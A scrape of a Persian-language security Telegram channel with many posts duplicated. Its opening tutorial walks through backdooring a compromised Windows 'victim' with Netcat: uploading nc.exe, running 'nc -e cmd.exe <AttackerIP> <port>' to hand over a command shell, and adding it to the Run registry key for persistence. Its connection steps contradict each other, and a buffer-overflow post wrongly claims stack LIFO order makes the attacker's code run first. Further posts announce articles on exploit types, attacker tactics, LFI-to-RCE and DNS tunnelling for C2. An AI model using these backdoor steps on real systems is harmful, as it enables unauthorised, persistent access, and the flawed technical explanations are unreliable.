سلام خدمت همه ی همراهان تیم امنیتی بیت🔥
توی این آموزش میخوایم ایجاد Backdoor رو با Netcat بررسی کنیم.
♦️اول اینکه Netcat چیه؟
این ابزار که به چاقوی سوئیسی هکر ها مشهوره برای ایجاد ارتباط بین دوتا سیستم از طریق محیط خط فرمان هست(هم ویندوز هم لینوکس)
این ابزار اوپن سرورس و رایگانه.
♦️اما سوال دوم اینکه Backdoor یا همون درب پشتی چیه؟
فرض کنید شما به یک سیستمی حمله کردید و دسترسی گرفتید. اما اگه مدیر اون سرور یا سیستم متوجه بشه و دسترسی شما رو قطع کنه چی میشه؟
تمام زحماتتون بر باد میره.
اما شما میتونید در زمانی که هنوز دسترسی دارید با روش های مختلفی میتونید یک دسترسی ثانویه برای خودتون ایجاد کنید که اگر دسترسی اول از دست رفت دسترسی ثانویه باقی بمونه.
🎯اما روش کار :
در این سناریو تارگت ما ویندوزی هست..🥊
بعد از گرفتن دسترسی باید فایل netcat.exe خودتون رو روی تارگت آپلود کنید.
بعد از آپلود باید این دستور رو توی خط فرمان تارگت وارد کنید :
nc -e cmd.exe <ActtackerIP> <port>
به جای attackerip باید ip سیستم خودتون و به جای port پورت دلخواه خودتونو بزارید.
بعد برای اتصال به بکدور باید این دستور رو روی سیستم خودتون بزنید :
nc -v <targetIP> <port>
که به جای targetip آدرس قربانی و به جای port همون پورتی که روی تارگت تنظیم کردید رو وارد کنید و دسترسی ایجاد میشه.
🚨اما یه نکته و اون اینکه این بکدور دائمی نیست و برای دائمی شدنش باید مسیر فایل nc.exe رو روی سیستم تارگت در رجیستری سیستم وارد کنید تا هربار که سیستم روشن میشه بکدور شما هم اجرا بشه
در این مسیر رجیستری:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
@Bitsecurityteam
توی این آموزش میخوایم ایجاد Backdoor رو با Netcat بررسی کنیم.
♦️اول اینکه Netcat چیه؟
این ابزار که به چاقوی سوئیسی هکر ها مشهوره برای ایجاد ارتباط بین دوتا سیستم از طریق محیط خط فرمان هست(هم ویندوز هم لینوکس)
این ابزار اوپن سرورس و رایگانه.
♦️اما سوال دوم اینکه Backdoor یا همون درب پشتی چیه؟
فرض کنید شما به یک سیستمی حمله کردید و دسترسی گرفتید. اما اگه مدیر اون سرور یا سیستم متوجه بشه و دسترسی شما رو قطع کنه چی میشه؟
تمام زحماتتون بر باد میره.
اما شما میتونید در زمانی که هنوز دسترسی دارید با روش های مختلفی میتونید یک دسترسی ثانویه برای خودتون ایجاد کنید که اگر دسترسی اول از دست رفت دسترسی ثانویه باقی بمونه.
🎯اما روش کار :
در این سناریو تارگت ما ویندوزی هست..🥊
بعد از گرفتن دسترسی باید فایل netcat.exe خودتون رو روی تارگت آپلود کنید.
بعد از آپلود باید این دستور رو توی خط فرمان تارگت وارد کنید :
nc -e cmd.exe <ActtackerIP> <port>
به جای attackerip باید ip سیستم خودتون و به جای port پورت دلخواه خودتونو بزارید.
بعد برای اتصال به بکدور باید این دستور رو روی سیستم خودتون بزنید :
nc -v <targetIP> <port>
که به جای targetip آدرس قربانی و به جای port همون پورتی که روی تارگت تنظیم کردید رو وارد کنید و دسترسی ایجاد میشه.
🚨اما یه نکته و اون اینکه این بکدور دائمی نیست و برای دائمی شدنش باید مسیر فایل nc.exe رو روی سیستم تارگت در رجیستری سیستم وارد کنید تا هربار که سیستم روشن میشه بکدور شما هم اجرا بشه
در این مسیر رجیستری:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
@Bitsecurityteam
[+] آسیب پذیری Buffer OverFolw و انواع آن
آسیب پذیری سر ریز بافر چیست؟
این آسیب پذیری باعث میشود که قسمی از حافظه تحت عنوان بافر پر شود و سرریز کند و همین سر ریز شدن به مهاجم اجازه میده تا کد های مخرب (Malicious Code) خودش رو به عنوان کد اصلی برنامه جا بزنه و از اونجایی که بافر پر شده هیچ گونه بررسی روی کد و Function های اون انجام نمیشه و مستقیم اجرا میشه.
انواع این آسیب پذیری :
× Stack-Based
× Heap-Based
البته دو نوع دیگر هم از این آسیب پذیری وجود داره که توی قسمت بعدی بررسی میشه.
نوع اول یعنی مبتنی بر Stack :
اول اینکه Stack یا پشته چی هست؟
پشته بخشی از ساختار memory هست که زمانی که یک Function فراخوانی میشه یک بلوک از پشته به اون اختصاص پیدا میکنه.
خب تا اینجا مشکلی نیست اما منطق کار پشته هست که مشکل ایجاد میکنه.
منطق پشته LIFO هست.
LIFO = Last In First Out
یعنی آخرین ورودی اولین خروجی هست.
یعنی وقتی پشته پر شد آخرین کد که کد مخرب هکر هست اولین چیزی هست که اجرا میشه و کار تمامه.
نوع دوم مبتنی بر Heap :
اما Heap چیه؟
یک قسمتی از memory هست که برخلاف پشته که به صورت استاتیک کار میکرد این قسمت به صورت داینامیک عمل میکنه.
یعنی هر زمانی که هر بلوکی از هیپ آزاد باشه متغیر های برنامه میتونن اون قسمت رو رزرو کنند.
و همین داینامیک بودن باعث میشه که هکر بتونه کد های مخربشو تزریق کنه به جای کد اصلی .
یعنی هر بار که هیپ پر میشه اگه هکر کد مخرب رو با کد اصلی جایگزین کنه چون هیچگونه بررسی انجام نمیشه مستقیم کد هکر اجرا میشه.
@BitSecurityteam
آسیب پذیری سر ریز بافر چیست؟
این آسیب پذیری باعث میشود که قسمی از حافظه تحت عنوان بافر پر شود و سرریز کند و همین سر ریز شدن به مهاجم اجازه میده تا کد های مخرب (Malicious Code) خودش رو به عنوان کد اصلی برنامه جا بزنه و از اونجایی که بافر پر شده هیچ گونه بررسی روی کد و Function های اون انجام نمیشه و مستقیم اجرا میشه.
انواع این آسیب پذیری :
× Stack-Based
× Heap-Based
البته دو نوع دیگر هم از این آسیب پذیری وجود داره که توی قسمت بعدی بررسی میشه.
نوع اول یعنی مبتنی بر Stack :
اول اینکه Stack یا پشته چی هست؟
پشته بخشی از ساختار memory هست که زمانی که یک Function فراخوانی میشه یک بلوک از پشته به اون اختصاص پیدا میکنه.
خب تا اینجا مشکلی نیست اما منطق کار پشته هست که مشکل ایجاد میکنه.
منطق پشته LIFO هست.
LIFO = Last In First Out
یعنی آخرین ورودی اولین خروجی هست.
یعنی وقتی پشته پر شد آخرین کد که کد مخرب هکر هست اولین چیزی هست که اجرا میشه و کار تمامه.
نوع دوم مبتنی بر Heap :
اما Heap چیه؟
یک قسمتی از memory هست که برخلاف پشته که به صورت استاتیک کار میکرد این قسمت به صورت داینامیک عمل میکنه.
یعنی هر زمانی که هر بلوکی از هیپ آزاد باشه متغیر های برنامه میتونن اون قسمت رو رزرو کنند.
و همین داینامیک بودن باعث میشه که هکر بتونه کد های مخربشو تزریق کنه به جای کد اصلی .
یعنی هر بار که هیپ پر میشه اگه هکر کد مخرب رو با کد اصلی جایگزین کنه چون هیچگونه بررسی انجام نمیشه مستقیم کد هکر اجرا میشه.
@BitSecurityteam
سلام خدمت همه ی همراهان تیم امنیتی بیت🔥
توی این مقاله میخوایم راجع به انواع اکسپلویت ها صحبت کنیم.
به طور کلی سه نوع اکسپلویت داریم :
A. Service Side
نوع اول مبتنی بر سرویس های شبکه هست.
اول ببینیم سرویس و اکسپلویت چیه؟
[1] - سرویس ها در واقع اون نرم افزار ها و خدماتی هستن که به صورت فعال روی سرور از طریق اینترنت یا شبکه محلی قابل دسترس هستند. مثل سرویس FTP یا اکتیو دایرکتوری یا DNS و... هستند مثل اکسپلویت های مربوط به همین آسیب پذیری اخیر به اسم PrintNightmare یا Spooler
حتما متوجه شدید که خیلی از این سرویس ها در واقع همون پروتکل های شبکه هستند.
[2] - اکسپلویت درواقع یک قطعه کد زبان های برنامه نویسی یا مجموعه دستورات پشت سر هم (شل اسکریپت) هست که با اهداف مختلفی روی یک سیستم به عنوان قربانی یا زامبی اجرا میشه.
B. Client Side :
این نوع اکسپلویت مربوط به نرم افزار های نصب شده یا تنظیمات انجام شده روی سیستم قربانی هست. مثلا اکسپلویت مربوط به آسیب پذیری مرورگر کروم یا مدیا پلیر VLC و...
C. Local Privilege Escalation :
دو نوع قبلی بیشتر برای ایجاد دسترسی به سیستم قربانی مورد استفاده قرار میگرفت اما این نوع سوم فقط برای ارتقاء سطح دسترسی در سیستم قربانی مورد استفاده هست. یعنی بعد از گرفتن دسترسی به سیستم قربانی برای اینکه سطح دسترسی خودمون رو به Root در لینوکس یا Administrator یا System در ویندوز ارتقاء بدیم و دسترسی کامل بگیریم به سیستم از این نوع اکسپلویت ها استفاده میکنیم مثل آسیب پذیری که در Sudo لینوکس وجود داشت که باعث میشد مهاجم دسترسی Root داشته باشه بدون مجوز .
موفق و پیروز باشید.
- - - - - - - @Pysecure | @Reza_sarvani - - - - - -
Channel ID : @Bitsecurityteam
توی این مقاله میخوایم راجع به انواع اکسپلویت ها صحبت کنیم.
به طور کلی سه نوع اکسپلویت داریم :
A. Service Side
نوع اول مبتنی بر سرویس های شبکه هست.
اول ببینیم سرویس و اکسپلویت چیه؟
[1] - سرویس ها در واقع اون نرم افزار ها و خدماتی هستن که به صورت فعال روی سرور از طریق اینترنت یا شبکه محلی قابل دسترس هستند. مثل سرویس FTP یا اکتیو دایرکتوری یا DNS و... هستند مثل اکسپلویت های مربوط به همین آسیب پذیری اخیر به اسم PrintNightmare یا Spooler
حتما متوجه شدید که خیلی از این سرویس ها در واقع همون پروتکل های شبکه هستند.
[2] - اکسپلویت درواقع یک قطعه کد زبان های برنامه نویسی یا مجموعه دستورات پشت سر هم (شل اسکریپت) هست که با اهداف مختلفی روی یک سیستم به عنوان قربانی یا زامبی اجرا میشه.
B. Client Side :
این نوع اکسپلویت مربوط به نرم افزار های نصب شده یا تنظیمات انجام شده روی سیستم قربانی هست. مثلا اکسپلویت مربوط به آسیب پذیری مرورگر کروم یا مدیا پلیر VLC و...
C. Local Privilege Escalation :
دو نوع قبلی بیشتر برای ایجاد دسترسی به سیستم قربانی مورد استفاده قرار میگرفت اما این نوع سوم فقط برای ارتقاء سطح دسترسی در سیستم قربانی مورد استفاده هست. یعنی بعد از گرفتن دسترسی به سیستم قربانی برای اینکه سطح دسترسی خودمون رو به Root در لینوکس یا Administrator یا System در ویندوز ارتقاء بدیم و دسترسی کامل بگیریم به سیستم از این نوع اکسپلویت ها استفاده میکنیم مثل آسیب پذیری که در Sudo لینوکس وجود داشت که باعث میشد مهاجم دسترسی Root داشته باشه بدون مجوز .
موفق و پیروز باشید.
- - - - - - - @Pysecure | @Reza_sarvani - - - - - -
Channel ID : @Bitsecurityteam
سلام خدمت همه ی کاربران عزیز تیم امنیتی بیت
توی این سری از مقاله ها میخوایم Tactic ها و Technique های مختلف مهاجمان رو بررسی کنیم، که در اولین مقاله هم به بررسی Tactic ای به نام Persistence میپردازیم
حتما این سری از مقالات رو از دست ندید، چون دید خیلی خوبی از رفتار مهاجمان رو بهتون میده
تاکتیک Persistence چیست؟
Channel ID : @Bitsecurityteam
توی این سری از مقاله ها میخوایم Tactic ها و Technique های مختلف مهاجمان رو بررسی کنیم، که در اولین مقاله هم به بررسی Tactic ای به نام Persistence میپردازیم
حتما این سری از مقالات رو از دست ندید، چون دید خیلی خوبی از رفتار مهاجمان رو بهتون میده
تاکتیک Persistence چیست؟
Channel ID : @Bitsecurityteam
تیم امنیتی بیت
تاکتیک Persistence چیست؟ - تیم امنیتی بیت Tactics - تاکتیک Persistence چیست؟
در این مقاله به آشنایی با Tactic ای به نام Persistence میپردازیم که در آن، هدف مهاجم حفظ دسترسی خود به سیستم قربانی با Technique های مختلف میباشد
پست جدید در وبلاگ سایت منتشر شد
مقاله معرفی انواع اکسپلویت ها به همراه مباحث تکمیلی
مشاهده آموزش: لینک[+]
Channel ID : @Bitsecurityteam
مقاله معرفی انواع اکسپلویت ها به همراه مباحث تکمیلی
مشاهده آموزش: لینک[+]
Channel ID : @Bitsecurityteam
تیم امنیتی بیت
Exploit چیست؟ به همراه معرفی انواع آن - تیم امنیتی بیت تیم امنیتی بیت -
در این مقاله با انواع مختلف Exploit آشنای میشیم و همچنین با توجه به انواع مختلف Exploit تعدادی CVE مختلف رو بررسی میکنیم که ازکدام نوع هستند.
آشنایی با تاکتیک Reconnaissance و بررسی نحوه استفاده از آن توسط مهاجمان
تاکتیک Reconnaissance چیست؟
Channel ID : @Bitsecurityteam
تاکتیک Reconnaissance چیست؟
Channel ID : @Bitsecurityteam
تیم امنیتی بیت
تاکتیک Reconnaissance چیست؟ - تیم امنیتی بیت
آشنایی با Tactic ـه Reconnaissance که در آن هدف مهاجم جمع آوری اطلاعات از Target موردنظر خود میباشد تا بتواند اهداف خود را برنامه ریزی شده پیش ببرد
سلام خدمت تمامی کاربران عزیز تیم امنیتی بیت
فروم سایت راه اندازی شد 🔥
از این به بعد میتونید به سادگی Topic راه اندازی کنید و داخل انجمن سایت فعالیت کنید و پرسش و پاسخ های خودتون رو انجام بدین 💪🏻
آدرس انجمن: https://forum.bitsecurityteam.com
Channel ID : @Bitsecurityteam
فروم سایت راه اندازی شد 🔥
از این به بعد میتونید به سادگی Topic راه اندازی کنید و داخل انجمن سایت فعالیت کنید و پرسش و پاسخ های خودتون رو انجام بدین 💪🏻
آدرس انجمن: https://forum.bitsecurityteam.com
Channel ID : @Bitsecurityteam
Forums
انجمن -
Forums
Forums
انجمن تیم امنیتی بیت
Bit Security Team pinned «سلام خدمت تمامی کاربران عزیز تیم امنیتی بیت فروم سایت راه اندازی شد 🔥 از این به بعد میتونید به سادگی Topic راه اندازی کنید و داخل انجمن سایت فعالیت کنید و پرسش و پاسخ های خودتون رو انجام بدین 💪🏻 آدرس انجمن: https://forum.bitsecurityteam.com Channel ID…»
تاکتیک های مهاجمان، در سایت آپدیت شدند
پیشنهاد میکنم مطالعه کنیدشون تا با تاکتیک های مختف مهاجمان آشنا بشید و بتونید بهتر رخداد های شبکه رو تحلیل کنید
تاکتیک Lateral Movement چیست؟
تاکتیک Initial Access چیست؟
Channel ID : @Bitsecurityteam
پیشنهاد میکنم مطالعه کنیدشون تا با تاکتیک های مختف مهاجمان آشنا بشید و بتونید بهتر رخداد های شبکه رو تحلیل کنید
تاکتیک Lateral Movement چیست؟
تاکتیک Initial Access چیست؟
Channel ID : @Bitsecurityteam
تیم امنیتی بیت
تاکتیک Lateral Movement چیست؟ - تیم امنیتی بیت - Tactics - تیم امنیتی بیت
بررسی تاکتیک lateral movement که در آن هدف مهاجم دسترسی بیشتر به سیستم های شبکه میباشد تا بتواند به طور گسترده تر فعالیت های مخرب خود را انجام دهد
سلام خدمت همه ی کاربران عزیز تیم امنیتی بیت 🔥
توی این writeup به بررسی یک آسیب پذیری در پارامتر های Authentication وب اپلیکیشن میپردازیم که در نهایت باعث تبدیل آسیب پذیری LFI به RCE میشه
دوستان علاقه مند به Bug Bounty و شکار تهدیدات در وب، حتما Writeup هارو دنبال کنند، چون دید فوق العاده ای بهتون میده در خصوص Chain کردن آسیب پذیری ها و Explit کردنشون در شرایط مختلف
تبدیل آسیب پذیری LFI به RCE از طریق PHP Session Variable ها
در صورتی که سوالی داشتید حتما در فروم ما بپرسید تا بقیه دوستان هم درگیر سوالاتتون بشن
Channel ID : @Bitsecurityteam
توی این writeup به بررسی یک آسیب پذیری در پارامتر های Authentication وب اپلیکیشن میپردازیم که در نهایت باعث تبدیل آسیب پذیری LFI به RCE میشه
دوستان علاقه مند به Bug Bounty و شکار تهدیدات در وب، حتما Writeup هارو دنبال کنند، چون دید فوق العاده ای بهتون میده در خصوص Chain کردن آسیب پذیری ها و Explit کردنشون در شرایط مختلف
تبدیل آسیب پذیری LFI به RCE از طریق PHP Session Variable ها
در صورتی که سوالی داشتید حتما در فروم ما بپرسید تا بقیه دوستان هم درگیر سوالاتتون بشن
Channel ID : @Bitsecurityteam
تیم امنیتی بیت
تبدیل آسیب پذیری LFI به RCE از طریق PHP Session Variable ها - تیم امنیتی بیت
توی این writeup به بررسی یک آسیب پذیری در پارامتر های Authentication وب اپلیکیشن میپردازیم که در نهایت باعث تبدیل آسیب پذیری LFI به RCE میشه
سلام خدمت تمامی کاربران عزیز تیم امنیتی بیت
در این مقاله به بررسی روش خارج کردن اطلاعات و ارتباط با C&C Server به کمک DNS Tunneling پرداخته ایم تا با روش مورد علاقه Malware Author ها آشنا شویم
مقاله: آشنایی با DNS Tunneling برای برقراری ارتباط با C2
Channel ID : @Bitsecurityteam
در این مقاله به بررسی روش خارج کردن اطلاعات و ارتباط با C&C Server به کمک DNS Tunneling پرداخته ایم تا با روش مورد علاقه Malware Author ها آشنا شویم
مقاله: آشنایی با DNS Tunneling برای برقراری ارتباط با C2
Channel ID : @Bitsecurityteam
تیم امنیتی بیت
آشنایی با DNS Tunneling برای برقراری ارتباط با C2 - تیم امنیتی بیت
در این مقاله به بررسی روش خارح کردن اطلاعات و ارتباط با C&C Server به کمک DNS Tunneling پرداخته ایم تا با روش مورد علاقه Malware Author ها آشنا شویم
♦️آسیب پذیری جدید در سیستم های مبتنی بر جونیپر (فایروال و..)
CVSS : 10 /10
CVE : CVE-2021-0248
@Bitsecurityteam
CVSS : 10 /10
CVE : CVE-2021-0248
@Bitsecurityteam
فایل های بالا سه مورد از بهترین منابع آموزشی جهت ابزار نویسی و تست نفوذ به واسطه زبان پایتون هستند.
@BITSECURITYTEAM
@BITSECURITYTEAM
سلام خدمت همه ی همراهان تیم امنیتی بیت، در این مقاله قصد داریم تا به بررسی آسیب پذیری Unquoted Service Path بپردازیم و ببینیم که به کمک این آسیب پذیری چجوری میشه از Service های ویندوز سواستفاده کرد تا فایل مخرب Attacker روی سیستم Target اجرا بشه
مقاله: آشنایی با آسیب پذیری Unquoted Service Path
Channel ID : @Bitsecurityteam
مقاله: آشنایی با آسیب پذیری Unquoted Service Path
Channel ID : @Bitsecurityteam
تیم امنیتی بیت
آشنایی با آسیب پذیری Unquoted Service Path - تیم امنیتی بیت
در این مقاله به بررسی آسیب پذیری Unquoted Service Path میپردازیم و میبینیم که مهاجم چجوری میتونه از سرویس هایی که به درستی ایجاد نشده اند سواستفاده کنه
نکاتی در خصوص Process نرمال svchost.exe
🔥 همیشه باید بدونید Normal چی هست تا بتونید Abnormal رو تشخیص بدید
@BitSecurityTeam
🔥 همیشه باید بدونید Normal چی هست تا بتونید Abnormal رو تشخیص بدید
@BitSecurityTeam